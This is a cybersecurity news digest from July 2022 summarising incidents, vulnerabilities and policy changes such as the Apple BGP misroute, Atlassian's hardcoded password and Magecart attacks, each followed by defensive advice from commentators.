Skip to Content

Cybersecurity and Infosec News Headlines Update on July 31, 2022

Some of Apple’s Network Traffic was Routed Through Russian ISP

For a 12-hour stretch on July 26 and 27, Russia’s Rostelecom was announcing routes for portions of Apple’s network. It is not known if this was due to a border gateway protocol (BGP) misconfiguration or if it was a deliberate hijacking.

Note

  • Never ascribe to malice what can be explained by a simple typo. Rostelecom owns 37.70.96.0/19 and rerouted 17.70.96.0/19 which is owned by Apple. Note the simple swapped digit in the beginning? Still, it would be nice if Apple would be able to roll out Route Origin Authorization, a feature that has made a real difference in some of these BGP route hijacks from causing more damage. And most of these “hijacks” are simple configuration mistakes. Change control is for people who can’t do incident response.
  • When you look at which groups have responsibility for availability and integrity of critical services, IT ops and Network ops really carry the bulk of the responsibility and authority, not security. But many of the tools and services that security uses will detect misconfigurations before IT/Network ops does. Integrated SOC/NOCs bring many benefits, next best thing is common or at least integrated tools being used across the groups.
  • Regardless of whether this rerouting was accidental or deliberate this incident is another prime example of the importance of end-to-end encryption for all communications.
  • While there is no official statement from them, Apple did take action by advertising more specific routes to services during the time their traffic was being routed to Russia, which is about the only recourse you have when this happens. It’s unlikely we will learn if this was deliberate, accidental, or a trial balloon for future activities. Make sure that you and your network team have a plan for this scenario.

Read more in

Google Pushing Back Deadline to Deprecate Third-Party Cookies

Google now says it will support third-party cookies until the second half of 2024. Two years ago, the company said it would phase them in 2022. Google says the decision was made based on “feedback we’ve received is the need for more time to evaluate and test the new Privacy Sandbox technologies before deprecating third-party cookies in Chrome.“

Note

  • Latest Facebook financial numbers seem to indicate that the lack of the ability to track users has material impact on the ad industrial complex. Google tried to replace cookies with FLoC (Federated Learning of Cohorts) but failed. Now they are trying “Topics” as a new tracking standard to balance privacy with Google’s need to accurately target and track the impact of ads it sells. We will see if that works, or if third-party cookies will stick around for a few more years.
  • The good news is even the Facebooks of the world and most US politicians are largely past the “privacy-denial” stage. The underlying revenue model for the Internet has to change from tricking people into exposing their personal information and then selling it. When cable TV needed more revenue that it could get from subscription services, cable TV introduced ads. The internet started with ads, and quickly moved to the selling personal info model to advertisers. However, many valuable services have found they can add subscription services for revenue and promise higher privacy as a large part of the consumer allure. It is very cool these days to see more software architects listing privacy as a key product requirement, and getting security involved vs. the other way around.
  • Recall Google first tried their FLoC solution which went over like a lead balloon, then in January of 2022, they rolled out the Topics API, and now we have the Privacy Sandbox, which will be available in Chrome 104 Stable at the beginning of August. This gives you a little over a year to test and provide feedback.

Read more in

Multi-Factor Authentication Thwarts Ransomware Actors

Authorities in the European Union (EU) say they have seen cases in which multi-factor authentication stopped ransomware groups from proceeding with their attacks. Marijn Schuurbiers, head of operations at Europol’s European Cybercrime Centre (EC3), said, “In certain investigations, we saw [the attackers] trying to access companies – but as soon as they would hit two-factor authentication in this process, they would immediately drop this victim and go to the next.”

Note

  • In 2019, Microsoft published a study of 200M logins that show even simple text message-based MFA prevented 99.9% of phishing attacks from succeeding. So, we really don’t need more evidence, but always good to highlight successes. But, just as “airplane successfully lands at airport, no drinks are even spilled” headlines wouldn’t get many clicks, the press has learned that any successful attack does. Always good in our field to highlight successes whenever possible.
  • Is MFA perfect? No. Can it be bypassed. Yes. However, time and time again MFA has proven to be one of the single most effective controls people can enable to protect their digital lives and data. As a security awareness professional, if I could teach people only one single behavior to protect themselves, enabling MFA would most likely be it.
  • While this anecdote highlights the importance of MFA in protecting against attacks, it also reflects the high number of targets available to criminals that they can readily drop one potential victim and move on to the next one with weaker security controls. It is analogous to the joke about not needing to outrun the bear but just needing to outrun the other potential victim. It’s important that we continue to encourage organisations to adopt MFA where they can and that vendors, particularly cloud service providers, adopt MFA as a default setting.
  • As the Palo Alto Unit 42 report shows, the number one thing to thwart attacks is MFA. Even if you have some form of MFA, make sure that you’ve chosen wisely, particularly if you have SMS or Phone based MFA, which is an awesome step in the right direction, you need to move to phishing resistant forms of MFA.

Read more in

EPA Will Introduce Cybersecurity Into its Reviews of Critical Water Facilities

The US Environmental Protection Agency (EPA) will issue a new rule that will expand their reviews of critical water facilities to include cybersecurity. Deputy National Security Advisor for Cyber and Emerging Tech Anne Neuberger says the White House is working toward legislation that would give agencies like the EPA greater authority to impose cybersecurity requirements for organizations that operate elements of the country’s critical infrastructure.

Note

  • The US Government’s 2023 fiscal year starts on October 1 and here’s my wish for their New Year’s resolution: *All* government agency reviews of IT systems for any reason should include cybersecurity requirements in those reviews. All entities accepting federal funds related to anything that runs software (firmware has software, too) should be subject to those requirements.
  • There is nothing like an external review to shine a light on anything swept under the rug. While these systems should already be secure, publishing a mandate and specific required standards to follow will empower staff seeking management support to better secure their operations. This also means when competing for this business, companies will have to factor in the cost of meeting these requirements commensurate with the criticality and sensitivity of the data and service provided. Such requirements, including review expectations, should be SOP on any contract. Make sure that you’re regularly monitoring your contracted/outsourced services are as expected.

Read more in

Report: Chinese Threat Actors Attempted to Infiltrate US Federal Reserve for Years

A report from the US Senate Committee on Homeland Security and Governmental Affairs “reveals a sustained effort by China, over more than a decade, to gain influence over the Federal Reserve and a failure by the Federal Reserve to combat this threat effectively.”

Note

  • The Chinese are very patient, remember they think about actions taking fifty or more years, while we in the US tend to think in four-year cycles, as in election cycles. They target acquisition of intellectual property. Consider not only background checks on employees, but also repeating those periodically to make sure employees have not be co-opted.

Read more in

Unit 42: Vulnerability Disclosure to Exploit Time is Shrinking

According to a report from Palo Alto Networks Unit 42, the average time between a vulnerability being disclosed and it being exploited is growing smaller. Attackers were detected scanning for vulnerabilities within 15 minutes of their disclosure. The report draws its data from 600 incident response cases.

Note

  • Nice attention grabbing headline. And there is some truth to it. But the real answer as so often is: It depends. We had exploits being used against vulnerabilities within minutes of the vulnerability becoming known as far back as the “Witty Worm” (still one of my all time favorites). But the real challenge nobody has a good answer for: How am I able to predict which vulnerabilities will be exploited quickly vs. which once will never be exploited? Gazillions of sysadmin tears will be saved if someone can come up with an absolute accurate way to tell which vulnerabilities are “patch now” vs. “don’t bother.”
  • The top three contributors to attacker success are lack of MFA, EDR, and lack of patch management. While you’ve focused on endpoint and OS patching roll-out, don’t overlook the application layer on endpoints and servers. Ask when you can expect to MFA all externally facing services, then internal services – and don’t forget MFA on the desktop.

Read more in

Two People Arrested for Disabling Spain’s Radiation Alert Sensors

Two former Spanish government contract workers have been arrested for allegedly breaking into the country’s radioactivity alert system and disabling a third of its sensors. The pair allegedly deleted the alert system web app from the General Directorate of Civil Protection and Emergencies (DGPGE) control center, then hacked the sensors. The incident occurred in the spring of 2021.

Note

  • Spain has a network of 800 gamma radiation sensors designed to detect and alert on excessive radiation from one of their seven nuclear reactors. The attackers took down 300 of these sensors using illegitimate access to the DGPGE network. While the specifics on he attack vectors are unclear, you can mitigate some risks by making sure that you expeditiously disable/delete accounts for non-active employees, to include monitoring for re-activation or recreation. Also make sure any external entry points are not only implemented using current security guidance, but also require MFA. Don’t forget about physical access scenarios.

Read more in

EU Helped 1.5M Ransomware Victims

Europol says that authorities in the European Union (EU) have helped 1.5 million people and organizations regain data that had been encrypted with ransomware. The announcement was made on July 26, the sixth anniversary of the No More Ransom project, which brings law enforcement and IT companies together to help victims of ransomware.

Note

  • Nomoreranson.org is a solid effort, but the Vice piece states $1.5B was save across 1.5M people overall. I couldn’t find any backup for the math – that works out to $1,000 per victim, which seems odd. Could be skewed by a few big ones but need to know how much of the $1.5B was in previously ridiculously inflated “crypto currencies.” Still, a good effort to point your users to for education about how to avoid attacks at home and how best to deal with ransom demands if they do get hit.
  • This project is a great example of how effective public/private partnerships can be in the fight against cybercrime. The No More Ransom project is a resource all in cybersecurity should be aware of, I know we have successfully used it over the past years to successfully recover several victims of ransomware attacks. The site is available at www.nomoreransom.org.
  • To date, the group offers 136 free decryption tools for 165 ransomware variants including MAZE, REvil and GandCrab. Having a similar service supported by law enforcement worldwide would aid reporting and reduce likelihood of payment.

Read more in

Another Microsoft 365 Outage

On July 28, admins in North America were reporting that they could not access the Microsoft 365 admin center. After looking into the situation, Microsoft determined that the incident affected a broader group of admins. The company has restarted “the affected infrastructure” and says the issue has been resolved.

Note

  • The silver lining is this time end-users were not impacted, even though being blocked from performing admin actions is bloody annoying. Microsoft’s preliminary response was, again, certain servers were performing blow acceptable thresholds and they are working to optimize performance. When monitoring your service delivery components, make sure that you are equipped to communicate and respond commensurate with both your SLA and user expectations.

Read more in

Cyberattack Prompts MSP NetStandard to Shut Down Cloud Services

Kansas-based managed service provider (MSP) NetStandard shut down its MyAppsAnywhere cloud services after discovering that the company was the victim of a cyberattack. The attack was detected on July 26.

Note

  • Service providers are high leverage targets for attacks. Use press coverage to show management that security should be involved in any procurement of 3rd party services, which includes cloud services.
  • Many of us may have a simulation exercise to determine how our organization will respond to a ransomware attack, but have you considered what your playbook should be should one of your critical suppliers or cloud service providers become a victim?
  • If you’re using a MSP, make sure that you’ve had a frank conversation about what a compromise would entail. Would that expose your data or other customers’ data as well. Make sure that you have the relationship and communication paths needed to not only handle incident communication but also verify that their security remains as promised.

Read more in

Transparent Tribe adds new tools to its arsenal as it targets Indian colleges

Cisco Talos discovered an uncommon piece of malware targeting Ukraine aimed at a large software development company whose software is used in various state organizations within Ukraine. Talos believes this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor’s intent was to gain access to source a supply chain-style attack, though at this time, we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named “GoMet.” The malware was first observed on March 28, 2022.

Read more in

Users urged to patch Atlassian Confluence vulnerability immediately

Atlassian disclosed three critical vulnerabilities in its Confluence software last week, including one for a hardcoded password that was leaked on Twitter. The company urged users to immediately update to the latest version of the software or apply a mitigation measure. An attacker could use this hardcoded password to view all non-restricted pages within the Confluence user-group by default. Atlassian said in its advisory that the issue is expected to be exploited in the wild once the exploit was leaked online. The two other critical vulnerabilities affect almost all other Atlassian products. Read more: Attackers target Ukraine using GoMet backdoor

New Windows 11 Default Policy to Help Prevent RDP Brute-Force Attacks

Microsoft has enabled a default policy in Windows 11 builds that is designed to help thwart brute-force Remote Desktop Protocol (RDP) attacks. Accounts will be locked for 10 minutes after 10 incorrect login attempts. The account lock setting is available in Windows 10 but is not enabled by default.

Note

  • Nice move by Microsoft. RDP has been called “Ransomware Deployment Protocol” for a reason. Sadly, it is still widely deployed without sufficient controls and Microsoft’s move will make it slightly less likely for a carelessly deployed system to be compromised.
  • Two security policies that have been common requirements that have been too often ignored or bypassed are lockout after failed attempts and requiring MFA on all remote access. Microsoft turning on lockout by default for RDP is a good thing, but turning on MFA for RDP obviates the need for lockout and stops more than just brute force attacks.
  • Account lockout is excellent, and you should enable it on all platforms which support it. Now go make sure that any internet facing RDP requires MFA, and is sufficiently monitored and otherwise secured to withstand malfeasance.
  • It is good to see a vendor like Microsoft making security by default the standard setting in its newer products. It has been a long time coming and I hope we see this initiative spread to many other settings and products, not just those offered by Microsoft but for other vendors too.
  • This control is not disruptive and might well be enabled by default.

Read more in

HHS HC3 Urges Healthcare Sector Organizations to Consider Web App Security

The US Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) has released web application security guidance for the health sector. The publication defines web applications in healthcare, describes types of web app attacks, suggests mitigations, and provides additional cybersecurity resources.

Note

  • Teaching web application security for a few years now, I am always surprised by the lack of awareness around common web application security threats. This isn’t just a healthcare problem, and we have to stop looking at it as a software/developer issue. Security teams not understanding web logs and how to recognize common attacks are as much part of the problem as missing SBOMs and developers not understanding the risks of dom based XSS.
  • Even if you’re not in the healthcare sector, read the HHS PDF below. The mitigations and protections should not come as a surprise – what may surprise you is where you’re not doing them. Make sure your WAF is not in learning mode, but actively blocking attacks, login services should employ MFA, with monitoring as well as impossible access scenario detection and prevention. Make sure that your testing development requires issues found to be addressed, not merely noted.
  • This isn’t really guidance, it is a threat briefing from the HHS HC3 – a good basic presentation about web app security threats and controls but unfortunately no raising of the regulatory bar to force movement. It does include a nice list of web app security requirements from the HHS Cybersecurity Practices program that map to about 40 NIST Framework controls. If you are trying to justify increasing app security in 2023, use that as a checklist to point out compliance gaps.

Read more in

FileWave MDM Vulnerabilities

Researchers from Claroty’s Team 82 have discovered and disclosed two critical vulnerabilities in FileWave’s mobile device management (MDM) system. The flaws, an authentication bypass issue and a hard-coded cryptographic key can be remotely exploited to take control of vulnerable platforms. The flaws have been addressed in FileWave version 14.7.2.

Note

  • Web apps. again. A good old web application vulnerability in a piece of “security” software. No cloud involved here, just a good old web application vulnerability that is so boring that we rather have it than spend the time learning how to do authorization properly.
  • Don’t think MDM only impacts my smartphone fleet. MDM’s are managing Windows & Mac Laptops, as well as your iPhones/iPads/Android Tablets and smart phones. The exploit provides privileged access to a FileWave MDM, allowing for modifications across your fleet managed devices. As such, you want to roll out the fixed version. You’re going to need to update all your components – servers, boosters, imaging, admin and client platform. The good news is it’s a series of simple package updates.

Read more in

Update Questions for Confluence App Now

Last week, Atlassian disclosed several vulnerabilities, including a hard-coded password issue affecting the Questions for Confluence app. Atlassian has since reported that the password has been leaked online, which makes patching the app even more urgent.

Note

  • Too late. It’s probably already compromised if you had it exposed to the world. But that was probably just a honeypot anyway (at least it is now).
  • The hard coded password for the “disabledsystemuser” account has been published. Make sure you’ve deleted that account, and you monitor for it being recreated. This is a system account, so even if you remove the Atlassian product, the account remains. And yeah, apply the patches to your Atlassian products immediately.

Read more in

CosmicStrand UEFI Firmware Rootkit

Researchers at Kaspersky have detailed their findings about a Unified Extensible Firmware Interface (UEFI) firmware rootkit they are calling CosmicStrand. In 2017, researchers from Qihoo360 published a blog about an earlier variant of the rootkit, which they called Spy Shadow Trojan.

Note

  • Long gone are the days of moving the jumper or dip switch to permit firmware updates. As such you were making sure the updates were pushed from verified sources. This malware appears to be an update performed on an already otherwise compromised system. Once installed the firmware includes the CSMCORE DXE driver which enables a legacy boot process, adding accounts to the OS along the way. The killer is that you cannot just re-install/replace the drive to eliminate UEFI firmware implants. If you’re lucky you can install known good firmware, but odds are you’re in a physical hardware replacement scenario.

Read more in

SonicWall Releases Fixes for SQL Injection Vulnerability

SonicWall is urging users to upgrade Global Management System (GMS) and Analytic On-Prem products to address a critical SQL injection vulnerability. The issue is due to “improper neutralization of special elements used in an SQL command.” Users should upgrade to GMS 9.3.1-SP2-Hotfix-2 or later and Analytics 2.5.0.3-2520-Hotfix-1 or later.

Note

  • The likelihood of exploit can be reduced by deploying a WAF, but the right way to fix this is to deploy the update. Then look at how a WAF could help with this and other applications.
  • It is disappointing in the extreme that in 2022 we see a security vendor having to address a SQL Injection vulnerability in their product suite.

Read more in

TSA Revises Pipeline Cybersecurity Requirements

The US Department of Homeland Security’s (DHS’s) Transportation Safety Administration (TSA) has issued revised cybersecurity requirements for pipeline operators. The revisions were made in response to industry requests for “more flexibility to meet the intended security outcomes.“ The new pipeline cybersecurity directive takes effect on July 27 and expires on the same date in 2023.

Note

  • Two comments: (1) The “flexibility” added is largely by TSA changing to a “tell us what you will do and then we will audit to make sure you do what you say” approach which usually sets a very low bar for security. Good news is TSA has mandatory requirements for what must be included that cover the important basic hygiene elements. (2) There is a deadline for operators to submit plans, but there did not appear to be a deadline around TSA review and approval. Does TSA have the staff or contractor to do meaningful review with timely turn-around?
  • The initial version of the requirements, from July 2021, resulted in a flurry of 380 exception requests, an indication that this needed to be revisited. This is intended to be a more flexible framework to incorporate variances in environment and implementation. Operators have 21 days to submit a plan to implement the new requirements. Once approved, they are expected to actually implement them. Requirements include segmentation, MFA, incident response plans, auditing, and logging capabilities.

Read more in

T-Mobile Will Pay $500M Over Data Breach

T-Mobile has agreed to pay at least $500 million to settle legal action over a 2021 data breach that compromised information belonging to nearly 77 million customers. $350 million will go toward a settlement fund for members of a class action lawsuit and associated legal fees. T-Mobile has also agreed to spend at least $150 million to improve its security practices.

Note

  • These fines have been ramping up on a $/impacted user basis. Uber’s $148M fine in 2016 was $2.6/user, Equifax in 2017 as $4.29/user and T-Mobile’s fine for the 2021 breach is $6.49/user. The costs the breached companies paid outside of the fines is hard to define but typically in these mega breaches it is in $10 – 25/record exposed range – always more than the fine. The fines are useful to show CXOs and boards – in the vast majority of breaches, the cost of fines alone is much higher than what it would have cost to avoid or minimize the incident.
  • If the settlement is split equally among the 77 million customers, they get about $5 each. T-Mobile is partnering with Mandiant, Accenture and KPMG to improve their cybersecurity posture and conducting about 900,000 training courses for employees and partners. As this 2021 incident is the fifth publicly acknowledged security breach in four years, it’ll be interesting to see how effective these measures are.

Read more in

Uber Will Not Face Federal Prosecution Over 2016 Data Breach

Uber has publicly acknowledged that it attempted to cover up a 2016 data breach. The admission was made as part of a non-prosecution agreement with the US Department of Justice (DoJ). According to the agreement, the incident was investigated and disclosed by an executive leadership team that took the reins of the company the year after the breach. In addition, Uber has “has invested substantial resources to significantly restructure and enhance the company’s compliance, legal, and security functions.”

Note

  • The breach was due to attackers obtaining an access key which allowed them access to Uber’s databases of users and drivers. the information for 50 million users and 7 million drivers was exposed. Uber not only paid a ransom, but also around $148 million in settlements of civil litigation. The lesson here is to report incidents as required.
  • All CSOs should watch this case very carefully to see what legal liability their role could be exposed to by decisions made when dealing with a breach.

Read more in

FBI Warns on Targeted Attacks and AI

The FBI is worried that cyberattacks are becoming more sophisticated and targeted, and that AI will increasingly be used in attacks in the next few years. They’re specifically worried about attackers being able to target and disable an entire industry, like commercial real estate, and they worry that deepfakes will become indiscernible from real content within ~2 years. Read more: The growth in targeted, sophisticated cyberattacks troubles top FBI cyber official

Ukrainian Radio Station Hijacked to Spread Misinformation

Hackers out of Russia penetrated a Ukrainian radio station and broadcasted fake updates saying that President Zelenskiy was in critical condition and in intensive care. The president had to release a video to counter the false claims. Read more: Hackers breach Ukrainian radio network to spread fake news about Zelenskiy

LinkedIn Tops Phishing

Checkpoint says LinkedIn is still the most impersonated phishing brand, followed by Microsoft, DHL, Amazon, and Apple for the top 5. And LinkedIn came in at 45% while second place Microsoft was at 13%. Read more: LinkedIn remains the most impersonated brand in phishing attacks

Dragos Uncovers PLC Campaign

Dragos has uncovered an interesting password-stealing campaign targeted at industrial engineers and operators. The campaign used a technique to extract passwords from the PLC firmware directly and join the system into a botnet. Read more: Ingineous campaign aimed at hacking engineer’s computer brought to light by Dragos

Entrust Breach

Computer security company Entrust has been hit with a ransomware attack. Multiple government entities use Entrust for Identity and Access Management, including DoE, DHS, Department of the Treasury, and others. The attack took place in June and the ransomware group evidently purchased access through an access broker. Read more: Digital security giant Entrust breached by ransomware gang

Atlassian Security Updates Include Fix for Hard-Coded Password Issue

Atlassian’s security advisories for July 2022 include fixes for a hard-coded password vulnerability affecting the Questions for Confluence app for Confluence Server and Data Center. The app installs a user account, “disabledsystemuser,” that admins can use to migrate data to the Confluence Cloud. Atlassian notes that “a remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access any pages the confluence-users group has access to.” Users are urged to update to Questions for Confluence versions 2.7.38 and 3.0.5. Users can also disable or delete the account. A second advisory addresses multiple servlet filter vulnerabilities in eight of its products.

Note

  • Not just for the hardcoded password, these vulnerabilities are serious and need to be applied expeditiously. These Atlassian products are often central to organization’s software development process and a compromise could endanger this software.
  • When a physical substance (asbestos, lead, Red Dye #2, etc.)is found to be poisonous or dangerous, society can move pretty quickly to ban it. But, bad habits (eating too much fat/sugar salt, leaving the keys in the ignition, buffer overflows in code, hard coded passwords in apps, etc.) are much harder to eliminate. Every modern app testing tool detects the worst software coding/app security mistakes – require all software suppliers to show evidence of having run such tools or to be part of programs such as Veracode Verified, where the app test software vendor does it for them.
  • ​​​​​​​Atlassian included this account to aid cloud migration, and while considerate, including either hard coded credentials or authorization keys has repeatedly been found to be a source of exploitation. Make sure that your Atlassian products don’t include the disabledsystemuser account, delete it if found, creating fresh credentials for migration only for the duration of the project if you elect to migrate. Add checking for (and removing) disabled accounts “out of the box” right next to changing default passwords in your software installation/update process.

Read more in

Google Pulls Spyware-Infested Apps from Play Store

Google has removed 60 Android apps from the Google Play Store after they were found to contain malware. The apps in question were being used to spread Joker, Facestealer, Coper, and Autolycos malware.

Note

  • Google seems to have been very slow to remove this “fleeceware” and has not made a public statement providing justification. I think something like 3700 apps per day are added to the 3.5M or so apps in Google play – human inspection isn’t really feasible to augment all the automated checks. The good news is Android and iOS do have what Windows and Linux lack – by default software whitelists (app stores) that greatly raise the bar against malware.
  • These apps can either install premium dialers, such as Joker, which signs users up for expensive monthly subscription plans, or install malware. While there is some screening for malware when publishing content to the Google Play Store, the Joker-spreading apps keep being reintroduced as they are obfuscating their malicious activity by changing code, execution methods and payload retrieval processes/techniques. As always beware of over permissioned apps, only download apps from known developers and either your corporate or Google app stores. Play Protect will remove the malicious applications, you need to check your device for premium subscriptions you didn’t authorize and cancel them.

Read more in

Microsoft Resumes Office Macro Blocking

Microsoft has resumed blocking Office macros by default. It introduced the feature earlier this year, but recently rolled it back due to customer response. Microsoft wrote, “Based on our review of customer feedback, we’ve made updates to both our end user and our admin documentation to make clearer what options you have for different scenarios.”

Note

  • For organizations who experienced issues with macro blocking when Microsoft first started doing it: You will still be able to set your own policies, and Microsoft updated its guidance. As long as you set a specific policy manually, this change will not override it.
  • If you’d already configured the “Block macros from running in Office files from the Internet” policy, the setting will control the disablement behavior. Consult the updated Microsoft Guidance on how to enable macros from SharePoint or network shares to minimize impact, in general you want to disable Macros by default.

Read more in

IoCs for Malware Targeting Ukrainian Networks

US Cyber Command (CYBERCOM) and Ukraine’s Security Service have jointly issued a list of 20 indicators of compromise (IoC) for attacks that have been targeting Ukrainian networks. In addition, Mandiant has published a related “blog to provide insight and context on a sampling of malicious activity targeting Ukrainian entities during the ongoing war.”

Note

  • While these attacks are targeting Ukrainian entities, we know that there can be collateral damage, so better safe than sorry, include the IOCs in your SIEM. Also include information from the Mandiant report on the GRIMPLANT and GRAPHSTEEL spear phishing campaign.

Read more in

CISA Warns of Vulnerabilities in GPS Tracker

The US Cybersecurity and Infrastructure Security Agency (CISA) has published an advisory warning of multiple vulnerabilities in MiCODUS GPS tracker devices. The issues include use of hard-coded credentials; improper authentication; cross-site scripting, and authorization bypass through user-controlled keys. The vulnerabilities were discovered by researchers at BitSight.

Note

  • The vulnerable devices do not just allow for tracking of the vehicle, but could also be used to disable them. This could become a safety issue. The inaction of the vendor is appalling and should be taken as a clear sign to not procure any more of these products.

Read more in

NIST and Cloud Security Alliance Offer Guidance for Healthcare Sector

The US National Institute of Standards and Technology (NIST) has published an updated draft of its healthcare cybersecurity guidance, focusing on Health Insurance Portability and Accountability Act (HIPAA) compliance. NIST is accepting public comments through September 21, 2022. The Cloud Security Alliance (CSA) has published a document designed to help the healthcare sector address third-party vendor risk management.

Note

  • I’m not a big fan on 152 page documents that focus on how to comply with regulations vs. how to protect data/systems/services and demonstrate compliance as a byproduct of that. But, more than half of SP800-66 is reference documents and section 5 (which is still 47 pages long) is a good source of questions that need to be answered to secure public health information.
  • The goal is to augment the guidance to include more resources to help those struggling to implement the necessary security posture for HIPAA compliance. If you’re a practitioner in this space, provide feedback to increase the relevance of the guides and resources.

Read more in

Magecart Skimming Attacks Targeting Online Restaurant Ordering Services

Magecart skimming campaigns have been targeting MenuDrive, Harbortouch, and InTouchPOS online restaurant ordering services. The campaigns were detected by researchers from Recorded Future’s Insikt Group; more than 50,000 payment card records from more than 300 restaurants have been compromised.

Note

  • Attackers seek to leverage our increased use of online ordering from restaurants. The attackers are targeting the POS not the individual restaurants. As a subscriber to an online ordering service, verify that they are scanning server and bowser components, verifying that they are following PCI-DSS requirements to both inventory all JavaScript and traffic in and out of their website. Ask for proof of activities related to detection of Magecart and other similar threats.

Read more in

DoJ, FBI Recover Ransomware Payments Made by Healthcare Organizations

The US Department of Justice (DoJ) and the FBI have recovered half a million dollars in ransomware payments made to North Korean state-sponsored threat actors. The funds have been returned to two healthcare organizations. In addition, DoJ and the FBI were able to disrupt the threat actors’ operations.

Note

  • The hype around “cryptocurrency” and blockchain had reached unbelievable and really dangerous levels, so it is good to see criminal use of them be used by authorities to disrupt and catch criminals. Of course, many victims paid in crypto coins that in a few days were worth a small percentage of what was paid for them – kinda like recovering nickels when you lost $100 bills…
  • This is why you want a relationship with the FBI before you need it. The cooperation from the Kansas based facility allowed for both the recovery of the ransom payment, but also the identification of previously unidentified ransomware strain. Note that ransom payments for other victims were recovered, but without their reporting it’s unlikely those funds will be properly restored.

Read more in

Apple Releases Updates for Multiple Products

Apple has released updated for multiple products, including macOS Catalina, macOS Big Sur, macOS Monterey, iOS and iPadOS, watchOS, tvOS, and Safari. The updates address nearly 40 vulnerabilities, including a memory corruption flaw in WebRTC.

Note

  • The memory corruption flaw in WebRTC (CVE-2022-2294) is the same flaw Google disclosed as being actively exploited in Chrome browsers. Note the Safari update is included in the macOS 12.5 update, but must be installed separately on macOS 11.6 and 10.15. In addition to addressing vulnerabilities, iOS and iPadOS 15.6 include bug fixes and some new features such as being able to restart a live stream viewed with the TV app.

Read more in

FCC Investigates Mobile Carriers’ Use of Geolocation Data

The US Federal Communications Commission (FCC) is investigating how mobile carriers use geolocation data. FCC chair Jessica Rosenworcel has sent letters of inquiry to 15 mobile providers, asking them to answer a series of questions about their geolocation data retention and data sharing policies.

Note

  • While the FCC fined the major carriers over $200M in 2020 around misuse of customers location data, this issue has been a problem for more than a decade and the FCC has been slow to define user rights and carrier regulations around location data. If you have corporate wireless contracts with carriers, try to get questions around location data use and protection into RFPs – the market needs to feel demand around privacy.
  • This follows up on Feb. 2020 FCC proposed fine of $208 million after determining that Sprint, AT&T, Verizon and T-Mobile were selling access to the customer’s location information without ensuring that adequate protections were in place to prevent misuse of that information.

Read more in

Candiru Spyware Exploited Chrome Vulnerability

A vulnerability in Chrome that was patched earlier this month was previously exploited by Candiru spyware. The flaw was reported to Google on July 1 by researchers from Avast, who discovered the issue while investigating a spyware attack.

Note

  • Web Real-Time Communications (WebRTC) provided JavaScript interface to enable realtime voice, text and video communications between web browsers and devices. The WebRTC flaw, fixed July 4th, is being actively exploited. As such, you need to make sure that not only are your Chrome updates pushed out, but also that users are restarting the browser for the update to take effect. You can now push enterprise settings for Chrome browsers to both auto-update and force the relaunch in a defined period.

Read more in

Missouri’s BJC Healthcare Settles Class Action Lawsuit

BJC Healthcare in Missouri has agreed to pay eligible class action members between $250 and $5,000 each, and to implement security improvements, including multi-factor authentication (MFA). BJC estimates the terms of the settlement will cost about $2.7 million.

Note

  • If you’re impacted and seeking restitution, make sure you have a supporting paper trail to support your claims of expenses incurred. If you allow remote access to your email, enforce MFA, being careful to exclude SMS and phone-call verification methods. If you already have MFA, make sure it’s phishing resistant, if not, create a plan to get there from here.

Read more in

Transparent Tribe adds new tools to its arsenal as it targets Indian colleges

Cisco Talos has been tracking a new malicious campaign operated by the Transparent Tribe APT group. This campaign involves the targeting of educational institutions and students in the Indian subcontinent, a deviation from the adversary’s typical focus on government entities. The attacks result in the deployment of CrimsonRAT, Transparent Tribe’s malware of choice for establishing long-term access into victim networks. We assess with high confidence that a Pakistani web hosting services provider “Zain Hosting” was used for deploying and operating components of Transparent Tribe’s infrastructure. This is likely one of many third parties Transparent Tribe employs to prepare, stage and/or deploy components of their operation. Transparent Tribe primarily uses three Windows-based malware families to carry out espionage activities against their targets, including CrimsonRAT and ObliqueRAT. Read more: Transparent Tribe begins targeting education sector in latest campaign

ClamAV signature: Doc.Dropper.CrimsonRAT-9953641-4

Google fixes several vulnerabilities in Chrome, including one actively exploited in the wild Google released a series of patches for its Chrome web browser, including fixes for a high-severity heap buffer overflow vulnerability (CVE-2022-2294) in WebRTC. An attacker could exploit this vulnerability to carry out a range of malicious actions, including crashing the targeted device, causing a denial of service or executing remote code. Google stated in its release that CVE-2022-2294 is actively being exploited in the wild and is withholding additional information until users can patch for the issue. Additionally, Cisco Talos discovered a vulnerability in Chrome’s WebGPU standard that causes a use-after-free condition. The WebRTC vulnerability is the fourth zero-day vulnerability in Chrome to appear in the wild this year.

Read more in

Maliciously Crafted Password Crackers Target Industrial Systems

Threat actors are using Programmable Logic Controller password cracking tools that contain trojans to infect industrial systems. Researchers from Dragos have analyzed a malicious password cracking tool that contains malware known as Sality, which corrals infected systems into being part of a botnet.

Note

  • Downloading a random password cracker or any piece of software for that matter, and using it in a production environment without verifying the source and integrity of said software is never a good idea.
  • Downloading password crackers from unvetted sources and running it in production on systems connected to the Internet are 3 very bad practices. Great write up by Dragos.
  • In this case, the password cracking tool doesn’t crack the password, it exploits a vulnerability in the firmware which allows the password to be retrieved. While the software required a serial connection, Dragos researchers determined the exploit will also work over an Ethernet connection. A firmware update has been released by Automation Direct for this weakness. See CISA ICS Advisory 22-167-02. The Dragos blog post includes other PLCs, HMIs which the threat actor sells password “cracking” for.

Read more in

Spoofed GitHub Commit Metadata Creates Potential for Software Supply Chain Attacks

Researchers from Checkmarx say that spoofed metadata could be used to trick developers into using repositories that contain malicious code. Developers need to be vigilant about verifying the identities associated with commits.

Note

  • Verifying if software is safe to use is hard. Between typo squatting and bad actors taking over legitimate repositories, it can be difficult to identify “trusted” components. Opensource components included in your software should at least be run through a static code analysis tool to look for obvious issues. Even better: If your code analysis tool finds an issues, fix it and submit a pull request.
  • I stumbled upon this issue when committing to GitHub from a virtual machine that had the wrong date and time. As I investigated it, I was surprised to see this was expected behavior. I knew there had to be a way to abuse it somehow and the folks at Checkmarx have documented just that.
  • GitHub has features (like Vigilant mode) to make it easier for developers to detect spoofed identities; work with App Dev to get that made part of standard processes.The entire open source software/repository supply chain needs to raise the bar on security. The Linux Foundation “Open Source Software Security Mobilization Plan” detailed the critical areas, more funding for faster progress is needed.
